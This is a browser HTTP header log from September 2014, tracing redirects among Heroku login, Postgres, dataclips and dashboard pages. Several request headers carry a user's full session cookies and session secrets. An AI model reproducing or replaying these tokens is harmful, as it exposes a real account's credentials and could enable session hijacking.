      Cookie[ref=KZaqbfoPQd2NM5_HmtNkDBgaDRYcVm4FgoRlK3QXRYUX5XYlLVpbKsbv-DvM8FmqnHEUYhAmss84wkpN3jOao6PJyJ90AhbTjDrK5i7V20kDxZvoen4Zz_bztDsXTa1J%7CTzM52sJrCEMP3TpTvJzGMA%3D%3D%7C4a7a7f34648ede535a79a2bc56dd9366b7df78a1462aa844f86196b14609e103; _ga=GA1.2.181049422.1411214008; __utma=148535982.181049422.1411214008.1411216956.1411228016.3; __utmc=148535982; __utmz=148535982.1411216956.2.2.utmcsr=postgres.heroku.com|utmccn=(referral)|utmcmd=referral|utmcct=/databases; optimizelySegments=%7B%22173438640%22%3A%22referral%22%2C%22173362769%22%3A%22ff%22%2C%22173444194%22%3A%22false%22%2C%22221602555%22%3A%22referral%22%2C%22221841254%22%3A%22ff%22%2C%22221734991%22%3A%22false%22%7D; optimizelyEndUserId=oeu1411214007860r0.1948891553088572; optimizelyBuckets=%7B%7D; rack.session=sqPL2wMwiUxRKRDIZRZpFZtpQVHNL051XZMscTdZzo85hsFiMzwNrL-ZgLLCf8llJTtLTk8ilInCKAeHek3hJ971JEcCHKfGmen-xMGjed0pjaT5KG1CKDBB-oPo5z_trM8eSSBDiLUnva-T9N6Pty3jwbNpxFYeHFG79jB1K1j-lc_-dB8tACasWzQbFPc5d-6ampRWbPJf4ZQhglDefQdPrvLEqwO5BD5uXKzT2WKvilkEqdnzzbUKXm3WD1GMWZwqsV6hkeUJMn5vbsVb32yIm1r7sWL5WxuYMvbTpEdMWcA5mDJzoc0ME_Oo0F4Sz3lhIxBhipySHAYlAiR6B7SQCocJGSCqIJckDiQ_cZ5wY8s2hmGAvL2YKGb4gZGLMR2VvJDC8AEOhbS5ofhZDrYTvEaRCFgqweI3KGFQlcie7C2AQnYFgo7UfnilQsLZEVKAZnJ_f6wy3t9a108LwzUxg5aQ27mYexe5IK3Ei2ji5BNFcphWiujvrHG4TjtQwtxfF6eZZhTurqM1Rcwle2hPfQqQlSMrEf54dh_nurL6Oyh3mMHi68mhDZm6zIaAq-GCGpx8PwNhwZ8Wp1ZjmD04fFsPKBZBA9pJ2IMuP5NBgP6dpkPuPa1MxIlDpPuz6PuK_ONBKPI-ApKey2g6_6r6dHXBZU-dBMAX9nNm16r7rEoJR4StN3ApBazWVxHDTMJdprFoMbcAYsUEsjFQBMuNMwe3GKxvFKNynwK-GWsjCxL_BMe8pZQVaW7h-qSZWydA4Pmx9VmkTdEZ7e4BXiGXZCUo6et8QyZLK4SfV4tod03s6MkB3nbWjSLEsJyo4KQSDu4jJyqP7g9nvRuJz67XHl_pTLcV2updPygb3qrlyeFZLhuXtjsDbpWHMxWjvjhX7g63QkdsCSsytKBOYNsKZu8npvW59b3U6jO-aB-ZN4hMDbogRSKRhRE1bIrN%7CbHVM61lFujhv41-3Kbdezg%3D%3D%7C90aed411ab431962695b4954963c46d29c694c5b89ee793a1654e400d0830070; _ga=GA1.3.181049422.1411214008; visitor_id36622=273629684; heroku_session=1; heroku_session_nonce=891e297c-fed0-4932-8c59-32d7d341f4dc; __utmb=148535982.59.9.1411228524365; optimizelyPendingLogEvents=%5B%22n%3Dengagement%26g%3D170873954%26u%3Doeu1411214007860r0.1948891553088572%26wxhr%3Dtrue%26t%3D1411228532074%26f%3D%22%2C%22n%3Dhttps%253A%252F%252Fwww.heroku.com%252Fhome%26u%3Doeu1411214007860r0.1948891553088572%26wxhr%3Dtrue%26t%3D1411228529309%26f%3D%22%5D]
      Connection[keep-alive]
   Response Header:
      Server[Cowboy]
      Date[Sat, 20 Sep 2014 15:55:42 GMT]
      Connection[keep-alive]
      Strict-Transport-Security[max-age=31536000]
      X-Frame-Options[SAMEORIGIN]
      X-XSS-Protection[1; mode=block]
      x-content-type-options[nosniff]
      Content-Type[text/html;charset=utf-8]
      Set-Cookie[heroku_session=; domain=.heroku.com; path=/; max-age=0; expires=Thu, 01 Jan 1970 00:00:00 -0000; secure
 heroku_session_nonce=; domain=.heroku.com; path=/; max-age=0; expires=Thu, 01 Jan 1970 00:00:00 -0000; secure
 rack.session=FaVrS4hqnR9mnjhckrTvVfSsfPhzKXgca1SNr8Oyr6N_-ub6c_egK8dLEHO_KeAnQB1aERkdfw_LeQdQHfDHrK-3DK91e12mqCMinL-Fsdndcdg7ZY1hyrdSQXmcs1ER5d2gkk4BeU8nn2irz9fWX7Qnwmax_MKaYj1JyCxhpwGBESHwyiMOtW0v4EAuhdDi1k31ltpEem6D7VXfj-2izYDDwNrCLOOYyifekUr2YnViziFTFcnECk7ynTFG7LrK%7CczNDqJrktR8EodaST7bDZA%3D%3D%7C855c1f5d2b8faf34a68e30535e723bfa6c2eec88e4819c36e02dba20099c14ed; path=/; expires=Mon, 20 Oct 2014 15:55:43 -0000; HttpOnly; secure]
      Location[https://id.heroku.com/login]
      Vary[Accept-Encoding]
      Content-Encoding[gzip]
      Request-Id[17eefe38-a226-46fc-8e1d-2f673d87db10]
      Transfer-Encoding[chunked]
      Via[1.1 vegur]
 17:55:32.937[159ms][total 818ms] Status: 200[OK]
 GET https://id.heroku.com/login Load Flags[LOAD_DOCUMENT_URI  LOAD_REPLACE  LOAD_INITIAL_DOCUMENT_URI  ] Größe des Inhalts[-1] Mime Type[text/html]
   Request Header:
      Host[id.heroku.com]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      Referer[https://www.heroku.com/home]
      Cookie[ref=KZaqbfoPQd2NM5_HmtNkDBgaDRYcVm4FgoRlK3QXRYUX5XYlLVpbKsbv-DvM8FmqnHEUYhAmss84wkpN3jOao6PJyJ90AhbTjDrK5i7V20kDxZvoen4Zz_bztDsXTa1J%7CTzM52sJrCEMP3TpTvJzGMA%3D%3D%7C4a7a7f34648ede535a79a2bc56dd9366b7df78a1462aa844f86196b14609e103; _ga=GA1.2.181049422.1411214008; __utma=148535982.181049422.1411214008.1411216956.1411228016.3; __utmc=148535982; __utmz=148535982.1411216956.2.2.utmcsr=postgres.heroku.com|utmccn=(referral)|utmcmd=referral|utmcct=/databases; optimizelySegments=%7B%22173438640%22%3A%22referral%22%2C%22173362769%22%3A%22ff%22%2C%22173444194%22%3A%22false%22%2C%22221602555%22%3A%22referral%22%2C%22221841254%22%3A%22ff%22%2C%22221734991%22%3A%22false%22%7D; optimizelyEndUserId=oeu1411214007860r0.1948891553088572; optimizelyBuckets=%7B%7D; rack.session=FaVrS4hqnR9mnjhckrTvVfSsfPhzKXgca1SNr8Oyr6N_-ub6c_egK8dLEHO_KeAnQB1aERkdfw_LeQdQHfDHrK-3DK91e12mqCMinL-Fsdndcdg7ZY1hyrdSQXmcs1ER5d2gkk4BeU8nn2irz9fWX7Qnwmax_MKaYj1JyCxhpwGBESHwyiMOtW0v4EAuhdDi1k31ltpEem6D7VXfj-2izYDDwNrCLOOYyifekUr2YnViziFTFcnECk7ynTFG7LrK%7CczNDqJrktR8EodaST7bDZA%3D%3D%7C855c1f5d2b8faf34a68e30535e723bfa6c2eec88e4819c36e02dba20099c14ed; _ga=GA1.3.181049422.1411214008; visitor_id36622=273629684; __utmb=148535982.59.9.1411228524365; optimizelyPendingLogEvents=%5B%22n%3Dengagement%26g%3D170873954%26u%3Doeu1411214007860r0.1948891553088572%26wxhr%3Dtrue%26t%3D1411228532074%26f%3D%22%2C%22n%3Dhttps%253A%252F%252Fwww.heroku.com%252Fhome%26u%3Doeu1411214007860r0.1948891553088572%26wxhr%3Dtrue%26t%3D1411228529309%26f%3D%22%5D]
      Connection[keep-alive]
   Response Header:
      Server[Cowboy]
      Date[Sat, 20 Sep 2014 15:55:42 GMT]
      Connection[keep-alive]
      Strict-Transport-Security[max-age=31536000]
      X-Frame-Options[SAMEORIGIN]
      X-XSS-Protection[1; mode=block]
      x-content-type-options[nosniff]
      Content-Type[text/html;charset=utf-8]
      Set-Cookie[heroku_session=; domain=.heroku.com; path=/; max-age=0; expires=Thu, 01 Jan 1970 00:00:00 -0000; secure
 heroku_session_nonce=; domain=.heroku.com; path=/; max-age=0; expires=Thu, 01 Jan 1970 00:00:00 -0000; secure
 rack.session=HSkfR06GR1NnxhFxsmBIy0sVnJareQJv2qjGRfPXqF3Dxw-NQDVWTkf5IxbkOvB9Z8WGGhGe2f4_P7ZkiWLRnuY_mYbgteaZNCrRtb13u0v7TCQN96dgWRfbP5lSlsLzJ3A_QBzFn0LtDWiUwv1GIPgmrGvMMRRNm6k7YRgVDF1VUVKLyo4eJ57fFw6kQG6_QeSZXL2pYCnvRe779I47DXgY-VrPXUbI5Uk9Cznr49pEvkkRfb3QatvMR8el3E8QT6StkYQQEDwzL2ZYJroQXhHPMa-yHcGVoNATooiumbPXBEOM1a-fKUdJ7s56yZ9l93Ie4fVxLOUtRRtjJd-O7Sg3FLqdiNM7siMYpSD_gxh_XT3hWYbd4h5t9Xoj_zgOtxiDJlM63RchlyCtoFERag%3D%3D%7CFvfX9eXB36GDcprUj47Nrg%3D%3D%7C3212ecd5bcd6a88fd376d7bd6a58dda06d5de2e01f9b066d2dce3e441b8d09b2; path=/; expires=Mon, 20 Oct 2014 15:55:43 -0000; HttpOnly; secure]
      Vary[Accept-Encoding]
      Content-Encoding[gzip]
      Request-Id[6c5a1418-f70d-4eb5-901c-8b333e82d2e3]
      Transfer-Encoding[chunked]
      Via[1.1 vegur]
 17:56:11.833[437ms][total 437ms] Status: 302[Found]
 GET https://postgres.heroku.com/databases Load Flags[LOAD_DOCUMENT_URI  LOAD_INITIAL_DOCUMENT_URI  ] Größe des Inhalts[-1] Mime Type[text/html]
   Request Header:
      Host[postgres.heroku.com]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      Referer[https://dataclips.heroku.com/clips/new]
      Cookie[ref=KZaqbfoPQd2NM5_HmtNkDBgaDRYcVm4FgoRlK3QXRYUX5XYlLVpbKsbv-DvM8FmqnHEUYhAmss84wkpN3jOao6PJyJ90AhbTjDrK5i7V20kDxZvoen4Zz_bztDsXTa1J%7CTzM52sJrCEMP3TpTvJzGMA%3D%3D%7C4a7a7f34648ede535a79a2bc56dd9366b7df78a1462aa844f86196b14609e103; _ga=GA1.2.181049422.1411214008; __utma=148535982.181049422.1411214008.1411216956.1411228016.3; __utmc=148535982; __utmz=148535982.1411216956.2.2.utmcsr=postgres.heroku.com|utmccn=(referral)|utmcmd=referral|utmcct=/databases; optimizelySegments=%7B%22173438640%22%3A%22referral%22%2C%22173362769%22%3A%22ff%22%2C%22173444194%22%3A%22false%22%2C%22221602555%22%3A%22referral%22%2C%22221841254%22%3A%22ff%22%2C%22221734991%22%3A%22false%22%7D; optimizelyEndUserId=oeu1411214007860r0.1948891553088572; optimizelyBuckets=%7B%7D; _session_id=BAh7CEkiD3Nlc3Npb25faWQGOgZFVEkiJWU0MWEyZTc5NDc5M2Q4YTI0MDg5OTUzZjYxODNkYTc3BjsAVEkiEF9jc3JmX3Rva2VuBjsARkkiMVRtUk91NGFhNWZBdDVRRURTem9XRmtWZkloRkFuMldMREJDYXZHd3ltK1E9BjsARkkiD2NzcmYudG9rZW4GOwBUSSIxbjJoak5xNkRSNEdkaWlOak1JOTJ2VHB5dmtqK1NKYW8xNXBwLy9oSHhMUT0GOwBG--16c1365df04da320c8f856f41afe6b154b068da3; user_session_secret=BAhJIgHCUms1UlVXbGhSelUzZFRFd1VuRk5TMWhDU0ZWRVptMXRkVnBWVVVjeFQyaHBTWGh6VEdOc2NHWXdiVmRDWTFZMWNVdFVWMGhuUTFKSVowNW5lV3BaUjNrNE1teEtTVTlCT0RNclZDdFdTR2xHVkM5elVtYzlQUzB0U2pWaWFEbGlNM0pLVTBkSlFWSlRPRTlIUTJaaFFUMDktLTc0MTM3N2ZhOTc5ZmRiYjNmMjI2N2EzYzU1NmNlOTRkYmNjMzg2YzkGOgZFRg%3D%3D--0423c026f66ea9da3bf9c5f335ac142a95b2e819; postgres_session_nonce=891e297c-fed0-4932-8c59-32d7d341f4dc; __utmb=148535982.62.9.1411228524365]
      Connection[keep-alive]
   Response Header:
      Server[Cowboy]
      Connection[close]
      Date[Sat, 20 Sep 2014 15:56:22 GMT]
      status[302 Found]
      Strict-Transport-Security[max-age=99; includeSubdomains]
      X-Frame-Options[SAMEORIGIN]
      X-XSS-Protection[1]
      Location[https://postgres.heroku.com/login]
      Content-Type[text/html; charset=utf-8]
      x-ua-compatible[IE=Edge,chrome=1]
      Cache-Control[no-cache, private]
      Set-Cookie[_session_id=BAh7CUkiD3Nlc3Npb25faWQGOgZFVEkiJWU0MWEyZTc5NDc5M2Q4YTI0MDg5OTUzZjYxODNkYTc3BjsAVEkiEF9jc3JmX3Rva2VuBjsARkkiMVRtUk91NGFhNWZBdDVRRURTem9XRmtWZkloRkFuMldMREJDYXZHd3ltK1E9BjsARkkiD2NzcmYudG9rZW4GOwBUSSIxbjJoak5xNkRSNEdkaWlOak1JOTJ2VHB5dmtqK1NKYW8xNXBwLy9oSHhMUT0GOwBGSSIQcmVkaXJlY3RfdG8GOwBGIg8vZGF0YWJhc2Vz--ed40c9baff4bd3ebaeb5a84c4b9afc6831c4b2a0; path=/; secure; HttpOnly]
      x-request-id[3757ef00-dcc8-44e7-9413-c3d1beab8f0d]
      x-runtime[0.008472]
      x-rack-cache[miss]
      Via[1.1 vegur]
 17:56:12.273[183ms][total 183ms] Status: 302[Found]
 GET https://postgres.heroku.com/login Load Flags[LOAD_DOCUMENT_URI  LOAD_REPLACE  LOAD_INITIAL_DOCUMENT_URI  ] Größe des Inhalts[-1] Mime Type[text/html]
   Request Header:
      Host[postgres.heroku.com]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      Referer[https://dataclips.heroku.com/clips/new]
      Cookie[ref=KZaqbfoPQd2NM5_HmtNkDBgaDRYcVm4FgoRlK3QXRYUX5XYlLVpbKsbv-DvM8FmqnHEUYhAmss84wkpN3jOao6PJyJ90AhbTjDrK5i7V20kDxZvoen4Zz_bztDsXTa1J%7CTzM52sJrCEMP3TpTvJzGMA%3D%3D%7C4a7a7f34648ede535a79a2bc56dd9366b7df78a1462aa844f86196b14609e103; _ga=GA1.2.181049422.1411214008; __utma=148535982.181049422.1411214008.1411216956.1411228016.3; __utmc=148535982; __utmz=148535982.1411216956.2.2.utmcsr=postgres.heroku.com|utmccn=(referral)|utmcmd=referral|utmcct=/databases; optimizelySegments=%7B%22173438640%22%3A%22referral%22%2C%22173362769%22%3A%22ff%22%2C%22173444194%22%3A%22false%22%2C%22221602555%22%3A%22referral%22%2C%22221841254%22%3A%22ff%22%2C%22221734991%22%3A%22false%22%7D; optimizelyEndUserId=oeu1411214007860r0.1948891553088572; optimizelyBuckets=%7B%7D; _session_id=BAh7CUkiD3Nlc3Npb25faWQGOgZFVEkiJWU0MWEyZTc5NDc5M2Q4YTI0MDg5OTUzZjYxODNkYTc3BjsAVEkiEF9jc3JmX3Rva2VuBjsARkkiMVRtUk91NGFhNWZBdDVRRURTem9XRmtWZkloRkFuMldMREJDYXZHd3ltK1E9BjsARkkiD2NzcmYudG9rZW4GOwBUSSIxbjJoak5xNkRSNEdkaWlOak1JOTJ2VHB5dmtqK1NKYW8xNXBwLy9oSHhMUT0GOwBGSSIQcmVkaXJlY3RfdG8GOwBGIg8vZGF0YWJhc2Vz--ed40c9baff4bd3ebaeb5a84c4b9afc6831c4b2a0; user_session_secret=BAhJIgHCUms1UlVXbGhSelUzZFRFd1VuRk5TMWhDU0ZWRVptMXRkVnBWVVVjeFQyaHBTWGh6VEdOc2NHWXdiVmRDWTFZMWNVdFVWMGhuUTFKSVowNW5lV3BaUjNrNE1teEtTVTlCT0RNclZDdFdTR2xHVkM5elVtYzlQUzB0U2pWaWFEbGlNM0pLVTBkSlFWSlRPRTlIUTJaaFFUMDktLTc0MTM3N2ZhOTc5ZmRiYjNmMjI2N2EzYzU1NmNlOTRkYmNjMzg2YzkGOgZFRg%3D%3D--0423c026f66ea9da3bf9c5f335ac142a95b2e819; postgres_session_nonce=891e297c-fed0-4932-8c59-32d7d341f4dc; __utmb=148535982.62.9.1411228524365]
      Connection[keep-alive]
   Response Header:
      Server[Cowboy]
      Connection[close]
      Date[Sat, 20 Sep 2014 15:56:22 GMT]
      status[302 Found]
      Strict-Transport-Security[max-age=99; includeSubdomains]
      X-Frame-Options[SAMEORIGIN]
      X-XSS-Protection[1]
      Location[https://postgres.heroku.com/auth/heroku]
      Content-Type[text/html; charset=utf-8]
      x-ua-compatible[IE=Edge,chrome=1]
      Cache-Control[no-cache, private]
      Set-Cookie[user_session_secret=; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT; secure
 super_user_session_secret=; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT; secure
 postgres_session_nonce=; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT; secure]
      x-request-id[aab5515c-db99-4516-afb9-f81c6d7427e3]
      x-runtime[0.005907]
      x-rack-cache[miss]
      Via[1.1 vegur]
 17:56:13.046[161ms][total 897ms] Status: 200[OK]
 GET https://id.heroku.com/login Load Flags[LOAD_DOCUMENT_URI  LOAD_REPLACE  LOAD_INITIAL_DOCUMENT_URI  ] Größe des Inhalts[-1] Mime Type[text/html]
   Request Header:
      Host[id.heroku.com]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      Referer[https://dataclips.heroku.com/clips/new]
      Cookie[ref=KZaqbfoPQd2NM5_HmtNkDBgaDRYcVm4FgoRlK3QXRYUX5XYlLVpbKsbv-DvM8FmqnHEUYhAmss84wkpN3jOao6PJyJ90AhbTjDrK5i7V20kDxZvoen4Zz_bztDsXTa1J%7CTzM52sJrCEMP3TpTvJzGMA%3D%3D%7C4a7a7f34648ede535a79a2bc56dd9366b7df78a1462aa844f86196b14609e103; _ga=GA1.2.181049422.1411214008; __utma=148535982.181049422.1411214008.1411216956.1411228016.3; __utmc=148535982; __utmz=148535982.1411216956.2.2.utmcsr=postgres.heroku.com|utmccn=(referral)|utmcmd=referral|utmcct=/databases; optimizelySegments=%7B%22173438640%22%3A%22referral%22%2C%22173362769%22%3A%22ff%22%2C%22173444194%22%3A%22false%22%2C%22221602555%22%3A%22referral%22%2C%22221841254%22%3A%22ff%22%2C%22221734991%22%3A%22false%22%7D; optimizelyEndUserId=oeu1411214007860r0.1948891553088572; optimizelyBuckets=%7B%7D; rack.session=Oj3BV4aM5iZSvASRXbZL38nzvzIIh2T_S6vdquNUi-OZ6JARZBmQ2zTzwbXj9r1M5TY2tCgCUDV6CmJzJm06aX0EH6gr2QJTjzVd64_n-FlnBUmFFLaDc_gtbPTYX3K8SsDCHAVVhA75xb6j6bvFqlPk-Ne-848PcKFchgdKGSflzC8_-Wfqqg9hppwmjdb6ia9bKqejpkXY49b0ehF8FxQp8s7etE4YxhHhvIzJqxUd3oxBjZo_F2Zoec30Cc6dRuPk5J8bocsC8_8Zq09DoZFqN_DOG41HDlbKIW1TKUtFLfCvuQ3KoE7cjM7dSdVzZZf7uehizmAGWkBPIWp-fJRoUG3L2Rpoo0VZdN_ih-BGCtGMNiFb3K4586XR9yQWMuEiikHz1yhZp_fK7oZk60Ps3vTnNi1zGxRcfW_N3ScLeVLSyHMqefqlqtVMAWqTf5qP5pbBhbPiwJKTnowmmNPx92DrmkqWD0SrdKHOVtcWrCvwmNW5dzG7zAFQ_BMFAU-1c7BDbIkTSBEI0YuSu48HuLkTAjNPJBuSLXJkj42h1MPsx3Vxz8HakjQxIJt1KirqkcQdZTlPheoKI0iYpi4V27TRMZtrb8AZh9mMtEo435snF2SDhMHSdzniCMlA7G-Ngw4EheMslTp5BsqmhIQiy0-hklsUKnMX8Hedh3g%3D%7CwHQzLOXMlHCSl_paZ8IydQ%3D%3D%7Cc627cc2ac2f61b0720781b7b15c81836840a4546ae4365f68d3c89ffd9d513d5; _ga=GA1.3.181049422.1411214008; visitor_id36622=273629684; __utmb=148535982.62.9.1411228524365]
      Connection[keep-alive]
   Response Header:
      Server[Cowboy]
      Date[Sat, 20 Sep 2014 15:56:22 GMT]
      Connection[keep-alive]
      Strict-Transport-Security[max-age=31536000]
      X-Frame-Options[SAMEORIGIN]
      X-XSS-Protection[1; mode=block]
      x-content-type-options[nosniff]
      Content-Type[text/html;charset=utf-8]
      Set-Cookie[heroku_session=; domain=.heroku.com; path=/; max-age=0; expires=Thu, 01 Jan 1970 00:00:00 -0000; secure
 heroku_session_nonce=; domain=.heroku.com; path=/; max-age=0; expires=Thu, 01 Jan 1970 00:00:00 -0000; secure
 rack.session=P8zZlFpkxJkI4ZLxjTorLaS7chYJ_xvm3tBRWqep-FyoNj_WSHDck99ggLaKgLczUMG6QylLu1VbNinWWd2uTvosTC3p811iQmobo8BwOeNgaY-Iyei8yP-c294TzPqzGmipSdIDCpCJJNlRu9fNDBgAppjFQi8lwNVmyyVPgwZc1tMa6KBi9Dx9Z6QxGLGykZPfxZvLCXHanhPgfRdxttpcO4uG-zklXg7kHrAri8MDvjXJbXvXr-BBnkWbr1hPFOH2z7BZXiBvTeKIuB6N_fqOEredXT8KRwcVGHxoHRFVsBQvr8bFqR8C_ImSzTqpkjjA_32wqf_t8oyVyGRt6Wf2RAjCO2Ve9nvECAaMhlA0AAChwZ7zPDYErU6WPGumLDLGGQJyeRxB31TPehBownCAIAtyZIBmoBmnCNRM5t6czeCBR1U7xMTBctVh58lH-0WIE1uESRcFYGiEjrefszmsjtQuv8XOS3i0zqBn4e7rKe5BQvvm_lWLlDOumVoMa7OKsaV7TuprlYP4n5LpWeOenBxb1JtTY8ASoQzv3rllKfG_LuQn0OGHVnCu9BsSd6B9qdZKqNZL1kA2xlt3SKrjt5qgIpLs3Wq4N3H3n5yXCIKduxNkqDFd5bJ8Ibx1prC44SktuOnv4v9xQaCTtWfw3NI_068iXRGBt0sDnq0%3D%7Cdyw4qNVeN1QJkse0PYVkMA%3D%3D%7Cf92ff337070c04e0bc1331b08bd2d38420af6bea0707a1ccfc813d4ce3b89c82; path=/; expires=Mon, 20 Oct 2014 15:56:23 -0000; HttpOnly; secure]
      Vary[Accept-Encoding]
      Content-Encoding[gzip]
      Request-Id[8583828c-b434-43b4-a8a2-9df47b64d82d]
      Transfer-Encoding[chunked]
      Via[1.1 vegur]
 17:56:37.841[603ms][total 603ms] Status: 302[Found]
 GET https://dashboard.heroku.com/account Load Flags[LOAD_DOCUMENT_URI  LOAD_INITIAL_DOCUMENT_URI  ] Größe des Inhalts[-1] Mime Type[text/html]
   Request Header:
      Host[dashboard.heroku.com]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      Referer[https://dataclips.heroku.com/]
      Cookie[ref=KZaqbfoPQd2NM5_HmtNkDBgaDRYcVm4FgoRlK3QXRYUX5XYlLVpbKsbv-DvM8FmqnHEUYhAmss84wkpN3jOao6PJyJ90AhbTjDrK5i7V20kDxZvoen4Zz_bztDsXTa1J%7CTzM52sJrCEMP3TpTvJzGMA%3D%3D%7C4a7a7f34648ede535a79a2bc56dd9366b7df78a1462aa844f86196b14609e103; _ga=GA1.2.181049422.1411214008; __utma=148535982.181049422.1411214008.1411216956.1411228016.3; __utmc=148535982; __utmz=148535982.1411216956.2.2.utmcsr=postgres.heroku.com|utmccn=(referral)|utmcmd=referral|utmcct=/databases; optimizelySegments=%7B%22173438640%22%3A%22referral%22%2C%22173362769%22%3A%22ff%22%2C%22173444194%22%3A%22false%22%2C%22221602555%22%3A%22referral%22%2C%22221841254%22%3A%22ff%22%2C%22221734991%22%3A%22false%22%7D; optimizelyEndUserId=oeu1411214007860r0.1948891553088572; optimizelyBuckets=%7B%7D; _my-heroku_session=BAh7CEkiEF9jc3JmX3Rva2VuBjoGRUZJIjFsZGdXRThzZ0IvNDJIMWJWM1dyU3ZXWXlpZUhMa21YWFVEc2lsV2ExR1ZRPQY7AEZJIg9zZXNzaW9uX2lkBjsAVEkiJWQ2OTI4OTJkOGQzMDliMzY5YWY5ODFmOThhNWU4NGU4BjsAVEkiC2luX29yZwY7AEZG--af37490991f3a343d1126f2e451efbf7744c0f9a; __utmb=148535982.65.9.1411228524365; user_session_secret=BAhJIgKKBWFGcHhTbVkzVUVjeE1TdGxVSGcwWTJ3clRVMTVWWE5pYkZsUFVrRkpVMkpPYkRsR2VVdHRVeTlQWTBkaFl5OUJlSGRHVVVNMEswOW5SR1pvUVVSdFZYUk9SVWxVZGxKS1UwdHJiRTgxZEhRNGMxTnJNbUZrYVVsa01VMUdWRmxJUVVkUlMxZzJTVkJ2YUdwSVJpdGtSSFVyWTNkRVdISkJjelp4UXpVMGRVOHZMekF4UzFCT2JYRXJibVpUTUV4SVJIVmxaa2QzTmtWQlJsSk5ibEpIWkVodksyVnphV1JXVEUxdlQzcEVOREYwWjNSc2RUUndhRmwyVUdObk0xaEJMMVpQUlN0SVMyazVkbWg1UzBWV1RsTlVWVVEyVjJOVFF6VlZUemxRVlZkelZIWm5WbFpxV21FMGJIRjJZM1F2UlRWSlN6Z3hVVkJNVVc1cWQwRjJRekJEWVVrd2RuY3dhVnBtTjFaQlluWlZlSEZCU2k5WGNYZ3pkVEJKTlRGaVNHSnRNRUpSVGpWdmJXVndjSEJsVGpKa09WVTNkM0pFVUd0WFVsaDNSbHBJVjNjd01WQkllbTlWUmtodlFXOUNXbEl4WlZkdmVIQk9ZVTVGWVdKM2FGcE5ORzFuU1ZCVmVHOVFUbTlHWkVKTFQzRkRLM3BVVjAxT1dYVXlUR055YTBGVGIwOVhSbFZ2UWxjMmEwVTBjV2R5TWpSVk9IWnBkSEEwY1RkaFZEZFpLeTloUnpSUVZtNW9Xa3hVVkVkUWFIWjRjamxhTUhoSE5FUk9RbTVwZW1RemNHcHlUVmhWWkVWelVEWk5PRlpvYkRNM2NscFBjR3RMUnpsRmVuVllSbXBCVlRseWNuZE1hSGMxVDJ4VGNVNW1lR0pVVnl0a2N6bFZZVlpqYkZsSFlXNHhZMWhvVVZFMFVVaG5iRzltTmpsRmFXZDRiVUp6VEhCQlZrZzFaWFpJVW1GQ01rNU5URUZuVnpGSlkyUkdSRnBaVkdJeVkwdGlWVm81ZEU1RGJFTXZha2xIVHpGWmJUQm9SREJ3WWtsUFpVVTJlWEJvUTA1amVTOURjbmw0UWpCa2EyRXZhblJtY1U5ak4wSk9kbkpYVEhKTGR5dGpSaXMyVlhwdWEzVnFiRlpKVXpkdldteDVVSFJrVTFsaVJXMHJjMVowVlhwcVdsSTRVV3dyY25GWFZFaEZMM1ZQTlZWRVRGSlRPRk14Y2s1MFltRXdaelZUTkV0aFZqTmFZbFJ4T1N0WGNtMXBTR3RuWW1abVpYQkZXVVpQV21aM1JUZ3dNekUxTjA1ME5FOXBVRFF2Ykc1TGJYSjBVUzltTTAxRFkwcEdaVnAzUjNsSE5rNW5aRk5XSzNwT1ExVnhPR2hKVGpWd1NqaGtTWE4wTkdacVFrUTFRMk5IV0dwb1JYbFNPWEoxZG05T1pWWXlhM2xpUW1wMWJHVmxTelJ6V2xWMVZURkhMMDE1Y210SlVrVkVMMjk2T0ZKTWEwTTNVVWRyTkVNcmEwOXJibEJWTW5GcVMxRnRjMFJsU1VobWREbHRPV3hvTDNkRE9ITmtjVGwxVFRoRlpXaHJaVk5hTlV0VWFIaFBVVVZGUVRCQk4wWmxNMmR4ZVdoNlJHMDJXRzFhVG1OVVlVaDZTMDl6U3pNM2MzUk5PWEJaTUhWUFEwNVlRekZJWmpCS01HaGFVM05XYVU4NFVtZFNOVnBoUW5SWUsyNDVWbkZhUWxWdlkxZHpPVFo0TjFWc1pGbHRTV0pOWkdwU2EwYzRaejB0TFVkRWRUWm1TV0ZVU2tjM1NXeFdRekJCYWs1cGJFRTlQUT09LS1jZTZmNmQ0MTBhNjQyNzhmZGNkMmEwMjk0ZDUxOGJhNjU0NmQzM2FjBjoGRUY%3D--bd9c611ce38c8221d606e59d0e41c5571aa3ef06; dashboard_session_nonce=891e297c-fed0-4932-8c59-32d7d341f4dc; _ga=GA1.3.181049422.1411214008; __utma=155166509.181049422.1411214008.1411228144.1411228144.1; __utmb=155166509.7.10.1411228144; __utmc=155166509; __utmz=155166509.1411228144.1.1.utmcsr=dashboard-next.heroku.com|utmccn=(referral)|utmcmd=referral|utmcct=/new; visitor_id36622=273629684; flash=%7B%7D]
      Connection[keep-alive]
   Response Header:
      Connection[keep-alive]
      Server[nginx/1.5.7]
      Date[Sat, 20 Sep 2014 15:56:48 GMT]
      Content-Type[text/html; charset=utf-8]
      Transfer-Encoding[chunked]
      status[302 Found]
      Strict-Transport-Security[max-age=31536000]
      Location[https://dashboard.heroku.com/login]
      Cache-Control[must-revalidate, no-cache, no-store, private]
      Pragma[no-cache]
